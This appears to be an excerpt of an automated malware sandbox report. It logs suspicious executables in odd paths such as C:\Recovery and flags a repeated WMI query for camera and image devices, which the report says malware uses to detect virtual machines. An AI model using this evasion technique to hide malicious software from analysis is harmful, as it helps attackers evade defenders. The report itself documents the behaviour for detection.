Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
